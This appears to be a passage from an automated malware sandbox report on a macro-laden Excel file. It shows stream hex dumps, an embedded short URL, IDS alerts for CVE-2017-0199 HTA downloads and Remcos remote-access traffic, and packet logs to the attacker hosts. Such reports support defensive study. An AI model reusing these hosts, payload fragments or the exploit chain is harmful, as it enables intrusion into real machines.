                                                                            Data ASCII:. . . . . < J . . c r . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . o . g . 1 . . . i . n . / . 2 . R . x . z . b . 3 . . . . y } ' 8 k o Q D ; Q i 8 _ . $ = m > L w . | : K e D b z I % ' . ; d c f l ` H . . m . . . ) . 1 . @ I M W b . [ . . X } . h . b d . . ` K . . . . . . . . . . . . . . . . . . . X . Z . y . K . 1 . J . C . r . k . M . a . 1 . Q . s . P . D . 7 . 0 . 9 . c . j . a . E . C . V . c . 5 . S . 9 . r . r . 4 . O . 7 . x . n . n . d . b . E . A . P . 2 . 6
                                                                            Data Raw:01 00 00 02 7f 3c d2 4a 07 0d 63 72 00 00 00 00 00 00 00 00 00 00 00 00 ae 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b aa 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6f 00 67 00 31 00 2e 00 69 00 6e 00 2f 00 32 00 52 00 78 00 7a 00 62 00 33 00 00 00 01 f8 79 20 ef 7d 27 38 6b b7 fa 6f 51 44 b1 e2 8f cc 3b 51 69 38 fe 5f b7 f8 15 d4 24 3d 8a df 6d 3e a2 4c
                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 609346
                                                                            General
                                                                            Stream Path:Workbook
                                                                            CLSID:
                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                            Stream Size:609346
                                                                            Entropy:7.999424519225426
                                                                            Base64 Encoded:True
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . . n U l . . 1 , ' . V . _ 8 J Q C y [ . | \\ . A L 1 b . . . . . . . . . . \\ . p . R : N g \\ . 0 . 1 . | y u J % . * . 2 Z . L . . S 2 , . . 0 K . R . 7 6 5 X 0 f . . . . { 5 9 N . b . ~ . $ + Q . % k v . q Y # ' . B . . . ; P a . . . . . . . = . . . @ & . . . . 9 . @ . . . . . . K * . . . . n M . . . . . . . . . . . . . . . = . . . ` $ v f . . h . . h w . @ . . . . . . . J " . . . . . . . . . . . . . . { 1 . . . . . : K ~ . b ' . M 0 Y \\ 1 . . . ) T
                                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 0c 2e d0 8c 6e f8 f1 55 6c eb 7f 07 31 8e 2c 27 13 56 1a d2 f9 92 c1 ef 5f e2 38 ad 85 e4 4a 51 80 9b 43 c0 79 5b 0b 7c 5c 0e 41 4c a9 31 62 99 e1 00 02 00 b0 04 c1 00 02 00 bd 92 e2 00 00 00 5c 00 70 00 52 bb 97 96 3a ea 4e 67 5c 02 30 ff 09 31 e8 90 dc 9c 7c 98 79 a5 75 f9 92 a4 a1 e5 4a f3
                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                                                                            General
                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                            CLSID:
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Stream Size:523
                                                                            Entropy:5.230836006864179
                                                                            Base64 Encoded:True
                                                                            Data ASCII:I D = " { 6 D 9 F A 5 1 B - 4 A A 7 - 4 6 E 3 - A F F 2 - D 8 8 9 5 3 F E B 8 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 2 B 0 9 E 5 C 1 A 6 0 1 A 6 0 1
                                                                            Data Raw:49 44 3d 22 7b 36 44 39 46 41 35 31 42 2d 34 41 41 37 2d 34 36 45 33 2d 41 46 46 32 2d 44 38 38 39 35 33 46 45 42 38 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                            General
                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                            CLSID:
                                                                            File Type:data
                                                                            Stream Size:104
                                                                            Entropy:3.0488640812019017
                                                                            Base64 Encoded:False
                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                            General
                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                            CLSID:
                                                                            File Type:data
                                                                            Stream Size:2644
                                                                            Entropy:3.9689034279980033
                                                                            Base64 Encoded:True
                                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                            General
                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                            CLSID:
                                                                            File Type:data
                                                                            Stream Size:553
                                                                            Entropy:6.360876788840636
                                                                            Base64 Encoded:True
                                                                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 2 . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 32 8e 0a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-09-30T09:53:25.270470+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.3.220.2280TCP
                                                                            2024-09-30T09:53:25.275410+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.220.2280192.168.2.2249164TCP
                                                                            2024-09-30T09:53:27.893925+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166192.3.220.2280TCP
                                                                            2024-09-30T09:53:27.893933+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.220.2280192.168.2.2249166TCP
                                                                            2024-09-30T09:53:50.060315+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249172192.3.220.2280TCP
                                                                            2024-09-30T09:56:14.719678+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.2249173192.3.220.2280TCP
                                                                            2024-09-30T09:56:18.415693+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249174107.173.4.162404TCP
                                                                            2024-09-30T09:56:20.260276+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249175107.173.4.162404TCP
                                                                            2024-09-30T09:56:20.741800+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249176178.237.33.5080TCP
                                                                            2024-09-30T09:57:00.947013+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.2249177192.3.220.2280TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Sep 30, 2024 09:53:23.427298069 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:23.427340031 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:23.427418947 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:23.433723927 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:23.433741093 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:23.897062063 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:23.897223949 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:23.902725935 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:23.902733088 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:23.903028965 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:23.903078079 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:23.986929893 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:24.027400017 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:24.764448881 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:24.764528990 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:24.764621019 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:24.765052080 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:24.766000032 CEST49163443192.168.2.22104.21.78.54
                                                                            Sep 30, 2024 09:53:24.766012907 CEST44349163104.21.78.54192.168.2.22
                                                                            Sep 30, 2024 09:53:24.777735949 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:24.782713890 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:24.782807112 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:24.782862902 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:24.787741899 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270328999 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270344973 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270355940 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270370007 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270380974 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270396948 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270409107 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270421982 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270435095 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270447969 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.270469904 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.270515919 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.270515919 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.275409937 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.275475979 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.275490046 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.275532007 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.276501894 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359204054 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359220982 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359234095 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359261990 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359288931 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359289885 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359299898 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359309912 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359321117 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359329939 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359330893 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359343052 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359347105 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359364033 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359378099 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359749079 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359760046 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359780073 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359788895 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359800100 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359807014 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359812975 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.359831095 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.359846115 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.360567093 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.360585928 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.360596895 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.360609055 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.360626936 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.360635996 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.360647917 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.360671997 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.360685110 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.361798048 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.361849070 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.362013102 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.362056017 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.362159967 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.362199068 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.365792990 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.365806103 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.365817070 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.365840912 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.365856886 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448424101 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448481083 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448697090 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448710918 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448723078 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448734999 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448740959 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448754072 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448769093 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448880911 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448893070 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448904991 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448915958 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448925972 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448926926 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448936939 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448939085 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448952913 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.448968887 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448968887 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.448985100 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.449026108 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.449038982 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.449048996 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.449065924 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.449085951 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.449996948 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450007915 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450018883 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450030088 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450046062 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450059891 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450139999 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450150967 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450160980 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450171947 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450181961 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450195074 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450212955 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450664043 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450701952 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450856924 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450867891 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450879097 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450885057 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450896025 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450901031 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450907946 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450913906 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450918913 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.450932980 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450954914 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450954914 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.450985909 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.451030016 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.451546907 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.451590061 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.451716900 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.451728106 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.451757908 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.451770067 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.668700933 CEST8049164192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:25.668786049 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.760636091 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.761272907 CEST4916480192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:25.773030043 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:25.773061037 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:25.773147106 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:25.824666977 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:25.824686050 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:26.290174007 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:26.290277004 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:26.297611952 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:26.297621965 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:26.297909021 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:26.297982931 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:26.463382006 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:26.511411905 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:27.239551067 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:27.239604950 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:27.239633083 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:27.239653111 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:27.239686966 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:27.239701986 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:27.255732059 CEST49165443192.168.2.22172.67.216.244
                                                                            Sep 30, 2024 09:53:27.255747080 CEST44349165172.67.216.244192.168.2.22
                                                                            Sep 30, 2024 09:53:27.414360046 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.420080900 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.420851946 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.476290941 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.481775999 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893821001 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893845081 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893856049 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893866062 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893877983 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893887997 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893910885 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893923044 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893924952 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.893924952 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.893933058 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893944979 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.893970966 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.893970966 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.893970966 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.898921013 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.898932934 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.898943901 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.898972988 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.900700092 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.900700092 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.981539011 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.981658936 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.981671095 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.981682062 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.981720924 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.981775999 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.981806040 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.981818914 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:27.981960058 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.981971979 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.981982946 CEST8049166192.3.220.22192.168.2.22
